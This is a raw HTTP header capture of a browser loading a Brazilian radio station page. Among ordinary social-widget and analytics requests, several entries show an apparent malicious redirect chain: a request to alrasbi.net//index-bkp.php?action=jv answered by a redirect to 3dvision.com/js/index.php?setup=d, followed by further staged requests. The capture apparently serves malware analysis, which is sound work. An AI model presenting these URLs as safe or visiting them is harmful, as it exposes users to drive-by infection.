X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28549
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 522863
GET /yts/jsbin/www-embed_core_module-vfluzrvZV.js HTTP/1.1

Host: s.ytimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.youtube.com/embed/JG2PtG8fies?fs=1&amp;feature=oembed
HTTP/1.1 200 OK

Content-Type: text/javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Last-Modified: Thu, 25 Oct 2012 16:26:38 GMT
Date: Thu, 25 Oct 2012 16:45:51 GMT
Expires: Fri, 25 Oct 2013 16:45:51 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 43574
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 488946
GET /1/statuses/user_timeline.json?screen_name=@93fmgospel&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=1&clientsource=TWITTERINC_WIDGET&include_entities=true&1351672496964=cachebust HTTP/1.1

Host: api.twitter.com
GET /1/statuses/user_timeline.json?screen_name=@93fmgospel&amp;callback=TWTR.Widget.receiveCallback_1&amp;include_rts=true&amp;count=1&amp;clientsource=TWITTERINC_WIDGET&amp;include_entities=true&amp;1351672496964=cachebust HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: application/javascript;charset=utf-8
X-RateLimit-Limit: 150
X-RateLimit-Remaining: 141
X-RateLimit-Reset: 1351673011
X-RateLimit-Class: api
Last-Modified: Wed, 31 Oct 2012 08:34:57 GMT
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Pragma: no-cache
Set-Cookie: guest_id=v1%3A135167249734029173; Expires=Fri, 31-Oct-2014 08:34:57 GMT; Path=/; Domain=.twitter.com
X-Transaction: 31ef249364af1df6
X-Frame-Options: SAMEORIGIN
Status: 200 OK
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Date: Wed, 31 Oct 2012 08:34:57 GMT
Content-Encoding: gzip
Content-Length: 861
Server: tfe
GET /rsrc.php/v2/yF/r/biEomB0hUUB.js HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fradio93.com.br%2Franking%2Ftu-podes-5%2F&amp;send=on&amp;layout=standard&amp;show_faces=true&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;width=300&amp;scrolling=
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Fri, 31 Aug 2012 02:56:52 GMT
X-Content-Type-Options: nosniff
Content-Encoding: gzip
X-FB-Debug: /ecYQHWVjdzEDzgxwIn+7glHvEnPgLrOamjRrVEIhr4=
Content-Length: 1571
Vary: Accept-Encoding
Cache-Control: public, max-age=27237560
Expires: Wed, 11 Sep 2013 14:34:17 GMT
Date: Wed, 31 Oct 2012 08:34:57 GMT
Connection: keep-alive
GET /rsrc.php/v2/yC/r/0Jj2a57GSC0.js HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fradio93.com.br%2Franking%2Ftu-podes-5%2F&amp;send=on&amp;layout=standard&amp;show_faces=true&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;width=300&amp;scrolling=
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Fri, 26 Oct 2012 02:03:08 GMT
X-Content-Type-Options: nosniff
X-FB-Debug: HdPaNY8KRLhf3NHD9drCPk+CKrxBAt+iyyVRSCVR4MQ=
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 545
Cache-Control: public, max-age=31465793
Expires: Wed, 30 Oct 2013 13:04:50 GMT
Date: Wed, 31 Oct 2012 08:34:57 GMT
Connection: keep-alive
GET /profile_images/1749544594/logo_twitter_normal.png HTTP/1.1

Host: a0.twimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Date: Wed, 31 Oct 2012 08:34:57 GMT
Etag: &quot;2d28816549a5504cf589d8f0bd484509&quot;
Expires: Thu, 31 Oct 2013 08:34:57 GMT
Last-Modified: Thu, 12 Jan 2012 06:48:09 GMT
Server: ECS (arn/46FC)
x-amz-id-2: Ceegw+znQQNF6UUaHRWirrN4IaPHxFvT4ZPqVIUKVDwqhMuzSCYrtXrHPNUhtorM
x-amz-request-id: 7A1F473A93A53A63
X-Cache: HIT
Content-Length: 5446
GET //index-bkp.php?action=jv&h=16831 HTTP/1.1

Host: alrasbi.net
GET //index-bkp.php?action=jv&amp;h=16831 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=afcca3aa8f0f249097810cdca0b44093
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://3dvision.com/js/index.php?setup=d
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.2.13, ASP.NET
Date: Wed, 31 Oct 2012 08:34:54 GMT
Connection: close
Content-Length: 0
GET /yts/imgbin/www-refresh-vfl5Dug1g.png HTTP/1.1

Host: s.ytimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://s.ytimg.com/yts/cssbin/www-embed-vflkVRvOv.css
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Mon, 22 Oct 2012 15:19:44 GMT
Date: Thu, 25 Oct 2012 07:20:31 GMT
Expires: Fri, 25 Oct 2013 07:20:31 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 39120
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 522866
GET /images/spacer.gif HTTP/1.1

Host: www.facebook.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fradio93.com.br%2Franking%2Ftu-podes-5%2F&amp;send=on&amp;layout=standard&amp;show_faces=true&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;width=300&amp;scrolling=
HTTP/1.1 200 OK

Content-Type: image/gif
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Expires: Fri, 30 Nov 2012 08:34:57 GMT
X-FB-Debug: JbwwSFi1oaLm1u/XYM+nicBDfeUAtdILJhpCPINIMRc=
Date: Wed, 31 Oct 2012 08:34:57 GMT
Connection: keep-alive
Content-Length: 43
GET /js/index.php?setup=d HTTP/1.1

Host: 3dvision.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=111ne103uprhdbtai4lotl0s55
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Oct 2012 08:53:07 GMT
Server: Apache/2.2.15
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
GET /yts/swfbin/watch_as3-vflLZZ_gv.swf HTTP/1.1

Host: s.ytimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.youtube.com/embed/JG2PtG8fies?fs=1&amp;feature=oembed
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Last-Modified: Tue, 30 Oct 2012 01:17:24 GMT
Date: Tue, 30 Oct 2012 03:14:18 GMT
Expires: Wed, 30 Oct 2013 03:14:18 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 277972
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 105640
GET /js/index.php?setup=d&s=2&r=886200 HTTP/1.1

Host: 3dvision.com
GET /js/index.php?setup=d&amp;s=2&amp;r=886200 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=111ne103uprhdbtai4lotl0s55
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Oct 2012 08:53:08 GMT
Server: Apache/2.2.15
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
GET /ga.js HTTP/1.1

Host: www.google-analytics.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
If-Modified-Since: Wed, 19 Sep 2012 11:51:40 GMT
HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Length: 14888
Content-Encoding: gzip
Last-Modified: Mon, 22 Oct 2012 15:51:19 GMT
X-Content-Type-Options: nosniff, nosniff
Date: Wed, 31 Oct 2012 07:20:30 GMT
Expires: Wed, 31 Oct 2012 19:20:30 GMT
Vary: Accept-Encoding
Age: 4469
Cache-Control: max-age=43200, public
Server: GFE/2.0
GET /widgets/tweet_button.1347008535.html HTTP/1.1

Host: platform.twitter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: guest_id=v1%3A135167249734029173
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=315569260
Last-Modified: Fri, 07 Sep 2012 09:05:04 GMT
Etag: &quot;466126c932f7c1afe8219c04876406a8&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 22673
Date: Wed, 31 Oct 2012 08:34:59 GMT
Connection: keep-alive
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
GET /plugins/like.php?api_key=165121076905166&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D11%23cb%3Dff735357c1205c%26origin%3Dhttp%253A%252F%252Fradio93.com.br%252Ff322c9b939bd7e2%26domain%3Dradio93.com.br%26relation%3Dparent.parent&href=https%3A%2F%2Fwww.facebook.com%2FRadio93.3fm&node_type=link&width=450&font=verdana&layout=button_count&colorscheme=light&show_faces=false&send=true&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=165121076905166&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D11%23cb%3Dff735357c1205c%26origin%3Dhttp%253A%252F%252Fradio93.com.br%252Ff322c9b939bd7e2%26domain%3Dradio93.com.br%26relation%3Dparent.parent&amp;href=https%3A%2F%2Fwww.facebook.com%2FRadio93.3fm&amp;node_type=link&amp;width=450&amp;font=verdana&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=true&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: sePmGjslZZJuIhSjLqY9vDQ4RYSzTCODQKkvWeGgrBE=
Date: Wed, 31 Oct 2012 08:34:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=608457311&utmhn=radio93.com.br&utmcs=UTF-8&utmsr=1176x885&utmvp=1159x778&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=Nothing%20found%20for%20Amor%20Class%20Class&utmhid=1685187608&utmr=-&utmp=%2Famor%2Fclass.class&utmac=UA-1740194-9&utmcc=__utma%3D177148198.1069102843.1351672500.1351672500.1351672500.1%3B%2B__utmz%3D177148198.1351672500.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=q~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=1&amp;utmn=608457311&amp;utmhn=radio93.com.br&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=1159x778&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=Nothing%20found%20for%20Amor%20Class%20Class&amp;utmhid=1685187608&amp;utmr=-&amp;utmp=%2Famor%2Fclass.class&amp;utmac=UA-1740194-9&amp;utmcc=__utma%3D177148198.1069102843.1351672500.1351672500.1351672500.1%3B%2B__utmz%3D177148198.1351672500.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&amp;utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 25 Oct 2012 07:23:10 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 522709
Server: GFE/2.0
GET /__utm.gif?utmwv=5.3.7&utms=2&utmn=2065726860&utmhn=radio93.com.br&utmcs=UTF-8&utmsr=1176x885&utmvp=1159x778&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=Nothing%20found%20for%20Amor%20Class%20Class&utmhid=1685187608&utmr=-&utmp=%2Famor%2Fclass.class&utmac=UA-3858909-12&utmcc=__utma%3D177148198.1069102843.1351672500.1351672500.1351672500.1%3B%2B__utmz%3D177148198.1351672500.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=q~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.7&amp;utms=2&amp;utmn=2065726860&amp;utmhn=radio93.com.br&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=1159x778&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=Nothing%20found%20for%20Amor%20Class%20Class&amp;utmhid=1685187608&amp;utmr=-&amp;utmp=%2Famor%2Fclass.class&amp;utmac=UA-3858909-12&amp;utmcc=__utma%3D177148198.1069102843.1351672500.1351672500.1351672500.1%3B%2B__utmz%3D177148198.1351672500.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&amp;utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 25 Oct 2012 07:20:31 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 522868
Server: GFE/2.0
GET /rsrc.php/v2/yD/x/Q8FTZ0iJJF2.png HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=165121076905166&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D11%23cb%3Dff735357c1205c%26origin%3Dhttp%253A%252F%252Fradio93.com.br%252Ff322c9b939bd7e2%26domain%3Dradio93.com.br%26relation%3Dparent.parent&amp;href=https%3A%2F%2Fwww.facebook.com%2FRadio93.3fm&amp;node_type=link&amp;width=450&amp;font=verdana&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=true&amp;extended_social_context=false
HTTP/1.1 200 OK

Content-Type: image/png
Access-Control-Allow-Origin: *
Last-Modified: Fri, 29 Jun 2012 21:48:06 GMT
X-Content-Type-Options: nosniff
X-FB-Debug: V2vYP5oZ8ftMm8TcnB9yv/rQrr/eubUM9cBAo6ffuRc=
Content-Length: 668
Cache-Control: public, max-age=25918677
Expires: Tue, 27 Aug 2013 08:12:57 GMT
Date: Wed, 31 Oct 2012 08:35:00 GMT
Connection: keep-alive
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1

Host: fpdownload2.macromedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/xml
Server: Apache
Last-Modified: Wed, 03 Oct 2012 19:48:11 GMT
Etag: &quot;289dff-26c-4cb2ceb2654c0&quot;
Accept-Ranges: bytes
Content-Length: 620
Date: Wed, 31 Oct 2012 08:35:00 GMT
Connection: keep-alive
GET /rsrc.php/v2/yf/r/ermz5xIRKqj.js HTTP/1.1

Host: static.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=165121076905166&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D11%23cb%3Dff735357c1205c%26origin%3Dhttp%253A%252F%252Fradio93.com.br%252Ff322c9b939bd7e2%26domain%3Dradio93.com.br%26relation%3Dparent.parent&amp;href=https%3A%2F%2Fwww.facebook.com%2FRadio93.3fm&amp;node_type=link&amp;width=450&amp;font=verdana&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=true&amp;extended_social_context=false
Origin: http://www.facebook.com
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Fri, 26 Oct 2012 01:14:26 GMT
X-Content-Type-Options: nosniff
Content-Encoding: gzip
X-FB-Debug: N+I8JRuT6Vc1XTfCzT6+2ZeZAilFlXFQGUdFwvperAo=
Content-Length: 37956
Vary: Accept-Encoding
Cache-Control: public, max-age=31465893
Expires: Wed, 30 Oct 2013 13:06:33 GMT
Date: Wed, 31 Oct 2012 08:35:00 GMT
Connection: keep-alive
POST / HTTP/1.1

Host: ocsp.verisign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request
HTTP/1.0 200 Ok

Content-Type: application/ocsp-response
Last-Modified: Wed, 31 Oct 2012 06:52:21 GMT
Expires: Wed, 07 Nov 2012 06:52:21 GMT
Content-Transfer-Encoding: binary
Content-Length: 1814
Cache-Control: max-age=598641, public, no-transform, must-revalidate
Date: Wed, 31 Oct 2012 08:35:00 GMT
nncoection: close
Connection: Keep-Alive
GET /t.gif?_=1351672499778&count=horizontal&id=twitter-widget-0&lang=en&original_referer=http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class&size=m&text=PRIMEIRA%20ESSENCIA&url=http%3A%2F%2Ftwitter.com%2F93fmgospel&via=%4093fmgospel&type=share&twttr_referrer=http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid= HTTP/1.1

Host: p.twitter.com
GET /t.gif?_=1351672499778&amp;count=horizontal&amp;id=twitter-widget-0&amp;lang=en&amp;original_referer=http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class&amp;size=m&amp;text=PRIMEIRA%20ESSENCIA&amp;url=http%3A%2F%2Ftwitter.com%2F93fmgospel&amp;via=%4093fmgospel&amp;type=share&amp;twttr_referrer=http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class&amp;twttr_widget=1&amp;twttr_hask=0&amp;twttr_li=0&amp;twttr_pid= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.1347008535.html
Cookie: guest_id=v1%3A135167249734029173
HTTP/1.1 200 OK

Content-Type: image/gif
Etag: &quot;377d257f2d2e294916143c069141c1c5:1328738114&quot;
Last-Modified: Wed, 08 Feb 2012 21:55:14 GMT
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: no-cache
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
Date: Wed, 31 Oct 2012 08:35:00 GMT
Connection: keep-alive
GET /crossdomain.xml HTTP/1.1

Host: i3.ytimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
If-Modified-Since: Thu, 09 Feb 2012 23:54:11 GMT
HTTP/1.1 304 Not Modified

HTTP/1.1 304 Not Modified
Date: Wed, 31 Oct 2012 07:21:45 GMT
Expires: Wed, 31 Oct 2012 13:21:45 GMT
Age: 4395
Server: GFE/2.0
GET /t.gif?_=1351672499798&count=horizontal&id=twitter-widget-1&lang=en&original_referer=http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class&size=m&text=QUESTIONA%20OU%20ADORA&url=http%3A%2F%2Ftwitter.com%2F93fmgospel&via=%4093fmgospel&type=share&twttr_referrer=http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid= HTTP/1.1

Host: p.twitter.com
GET /t.gif?_=1351672499798&amp;count=horizontal&amp;id=twitter-widget-1&amp;lang=en&amp;original_referer=http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class&amp;size=m&amp;text=QUESTIONA%20OU%20ADORA&amp;url=http%3A%2F%2Ftwitter.com%2F93fmgospel&amp;via=%4093fmgospel&amp;type=share&amp;twttr_referrer=http%3A%2F%2Fradio93.com.br%2Famor%2Fclass.class&amp;twttr_widget=1&amp;twttr_hask=0&amp;twttr_li=0&amp;twttr_pid= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.1347008535.html
Cookie: guest_id=v1%3A135167249734029173
HTTP/1.1 200 OK

Content-Type: image/gif
